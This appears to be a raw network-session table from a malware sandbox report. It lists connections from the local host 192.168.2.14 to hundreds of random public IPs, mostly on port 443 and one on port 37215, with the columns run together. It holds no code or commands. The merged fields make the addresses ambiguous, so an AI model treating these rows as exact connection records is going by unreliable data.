                                                        21162192.168.2.144522853.119.184.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21163192.168.2.144697845.154.30.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21164192.168.2.145030693.221.64.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21165192.168.2.143413488.47.16.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21166192.168.2.145946444.76.80.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21167192.168.2.1443504168.182.252.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21168192.168.2.1448548125.132.255.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21169192.168.2.1460662216.162.96.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21170192.168.2.1446292155.52.95.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21171192.168.2.144720871.202.101.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21172192.168.2.143680251.103.5.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21173192.168.2.1433146207.231.21.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21174192.168.2.1445216153.211.179.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21175192.168.2.14462781.93.166.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21176192.168.2.143787224.194.13.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21177192.168.2.1457564145.127.175.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21178192.168.2.145610242.143.235.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21179192.168.2.1445388120.103.183.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21180192.168.2.1453906143.171.154.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21181192.168.2.145324052.167.135.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21182192.168.2.143876436.202.132.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21183192.168.2.1458128129.158.142.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21184192.168.2.145109097.4.9.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21185192.168.2.1435000184.113.166.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21186192.168.2.145820246.196.60.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21187192.168.2.145115682.29.139.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21188192.168.2.1453616120.169.41.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21189192.168.2.1458656124.105.236.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21190192.168.2.144547431.153.254.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21191192.168.2.144062692.163.233.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192192.168.2.1460452153.63.147.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21193192.168.2.1434798161.253.234.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21194192.168.2.1439802134.65.199.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21195192.168.2.144784438.83.234.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21196192.168.2.144373434.160.175.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21197192.168.2.1435570216.170.118.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21198192.168.2.1452948101.182.222.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21199192.168.2.145746224.211.217.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21200192.168.2.145323675.189.10.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21201192.168.2.1454076213.41.4.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21202192.168.2.144544444.149.200.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21203192.168.2.1446352201.43.167.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21204192.168.2.1448524160.208.141.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21205192.168.2.1447022211.148.127.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21206192.168.2.143712657.162.109.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21207192.168.2.1440032111.52.42.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21208192.168.2.1459012112.142.166.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21209192.168.2.1449304173.9.78.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21210192.168.2.144940225.54.250.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21211192.168.2.144949861.44.19.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21212192.168.2.144711620.64.244.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21213192.168.2.145638442.84.247.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21214192.168.2.145280664.120.204.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21215192.168.2.1442646151.204.156.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21216192.168.2.1433232147.85.77.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21217192.168.2.1453484197.103.255.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21218192.168.2.1446570103.164.129.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21219192.168.2.144365668.69.175.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21220192.168.2.1458332192.7.62.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21221192.168.2.1438850216.110.136.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21222192.168.2.144892812.59.160.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21223192.168.2.1441984218.108.73.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21224192.168.2.1450462148.227.76.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21225192.168.2.144020048.5.5.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21226192.168.2.1445792152.202.127.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21227192.168.2.143453679.207.136.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21228192.168.2.1440874175.30.41.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21229192.168.2.143300643.193.126.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21230192.168.2.1448740203.33.16.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21231192.168.2.145628067.60.111.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21232192.168.2.1456578100.159.105.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21233192.168.2.143802234.87.69.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21234192.168.2.144202881.227.33.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21235192.168.2.1447590117.90.118.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21236192.168.2.1437384209.209.171.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21237192.168.2.145389661.205.122.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21238192.168.2.1446404171.32.13.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21239192.168.2.1433668137.85.185.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21240192.168.2.145235485.111.73.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21241192.168.2.1454168193.219.137.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21242192.168.2.144303099.127.113.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21243192.168.2.1459308194.69.234.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21244192.168.2.145423093.126.155.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21245192.168.2.1435158188.198.227.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21246192.168.2.144888653.7.109.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21247192.168.2.1436792131.93.3.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21248192.168.2.1450744209.115.70.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21249192.168.2.144769648.44.23.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21250192.168.2.1454976209.237.218.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21251192.168.2.1434034123.62.236.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21252192.168.2.1444552139.130.226.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21253192.168.2.1456020157.204.49.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21254192.168.2.1436386125.252.1.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21255192.168.2.1446448111.176.134.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21256192.168.2.1443880126.218.86.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21257192.168.2.1447614195.141.183.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21258192.168.2.1452506160.96.239.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21259192.168.2.1436246170.31.102.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21260192.168.2.1435902163.61.33.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21261192.168.2.1437446111.220.87.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21262192.168.2.1447932107.149.28.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21263192.168.2.143411652.47.30.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21264192.168.2.1452908138.207.106.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21265192.168.2.1441884166.11.3.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21266192.168.2.143354251.254.238.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21267192.168.2.1460832196.126.106.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21268192.168.2.1453188149.103.73.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21269192.168.2.1456674197.33.4.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21270192.168.2.146021496.141.137.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21271192.168.2.144865694.69.29.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21272192.168.2.144670688.176.184.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21273192.168.2.14412524.142.78.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21274192.168.2.1439244112.183.122.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21275192.168.2.143675035.199.178.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21276192.168.2.1445880198.122.164.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21277192.168.2.1456952153.58.214.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21278192.168.2.145000859.27.241.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21279192.168.2.144015250.97.98.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21280192.168.2.145371871.1.85.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21281192.168.2.1436472159.107.117.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21282192.168.2.1437534141.247.202.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21283192.168.2.1433984120.217.47.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21284192.168.2.143406296.71.157.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21285192.168.2.145706413.71.102.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21286192.168.2.145287885.186.53.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21287192.168.2.143739272.81.73.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21288192.168.2.145057296.142.65.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21289192.168.2.1446492213.187.17.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21290192.168.2.1443314153.119.98.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21291192.168.2.1446294192.86.2.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21292192.168.2.1457756136.175.191.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21293192.168.2.143879036.60.179.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21294192.168.2.1448010117.178.73.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21295192.168.2.1442324173.10.112.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21296192.168.2.143699689.80.223.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21297192.168.2.1436626147.46.230.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21298192.168.2.145131099.172.101.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21299192.168.2.1451826156.16.29.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21300192.168.2.1443350107.83.45.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21301192.168.2.1434012175.77.220.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21302192.168.2.1441164156.150.131.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21303192.168.2.144024250.234.220.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21304192.168.2.143567471.214.47.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21305192.168.2.1441460104.44.26.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21306192.168.2.1444546118.182.241.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21307192.168.2.145196023.119.236.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21308192.168.2.1455550201.171.143.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21309192.168.2.145509673.112.241.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21310192.168.2.145750870.115.78.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21311192.168.2.1459946150.139.151.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21312192.168.2.144184297.88.33.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21313192.168.2.1449496219.51.66.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21314192.168.2.1451786164.254.97.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21315192.168.2.1443286193.34.235.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21316192.168.2.1457896111.251.125.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21317192.168.2.145334853.33.38.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21318192.168.2.144061645.15.79.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21319192.168.2.1452846116.64.90.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21320192.168.2.143946449.87.105.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21321192.168.2.144158462.34.62.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21322192.168.2.1439782137.61.132.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21323192.168.2.1435788161.19.16.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21324192.168.2.14334424.0.132.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21325192.168.2.1438718196.230.68.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21326192.168.2.1443644223.152.97.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21327192.168.2.145547658.179.48.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21328192.168.2.1458746222.180.209.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21329192.168.2.144943490.235.153.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21330192.168.2.1440568153.27.16.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21331192.168.2.143995441.43.196.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21332192.168.2.1449238213.20.117.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21333192.168.2.1450108165.20.104.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21334192.168.2.1445684170.131.146.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21335192.168.2.1458192134.61.72.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21336192.168.2.1434152209.231.116.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21337192.168.2.144744025.200.49.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21338192.168.2.144624069.243.81.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21339192.168.2.145540213.79.205.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21340192.168.2.145428670.174.119.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21341192.168.2.14369188.253.27.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21342192.168.2.145542620.62.178.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21343192.168.2.1456634139.146.53.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21344192.168.2.144637217.168.52.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21345192.168.2.143543074.65.224.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21346192.168.2.145318425.202.200.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21347192.168.2.1459380218.5.227.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21348192.168.2.1460688210.109.7.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21349192.168.2.14566182.251.248.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21350192.168.2.1460120195.82.65.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21351192.168.2.1440830110.167.132.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21352192.168.2.1452484159.143.194.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21353192.168.2.1446044148.133.143.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21354192.168.2.1452984131.45.12.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21355192.168.2.14366081.22.112.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21356192.168.2.1435328174.104.97.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21357192.168.2.14495624.240.81.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21358192.168.2.145160499.228.85.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21359192.168.2.1448298111.40.252.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21360192.168.2.1434702100.222.107.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21361192.168.2.145449025.170.79.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21362192.168.2.143458637.255.104.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21363192.168.2.1442460167.147.236.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21364192.168.2.1437824152.127.67.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21365192.168.2.1447372202.83.122.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21366192.168.2.1452522205.184.126.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21367192.168.2.1443258204.193.170.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21368192.168.2.1439670104.203.139.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21369192.168.2.1439278183.94.111.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21370192.168.2.145235443.13.163.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21371192.168.2.145319084.13.53.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21372192.168.2.1444998121.56.218.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21373192.168.2.1453612123.247.243.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21374192.168.2.1447578221.130.78.186443
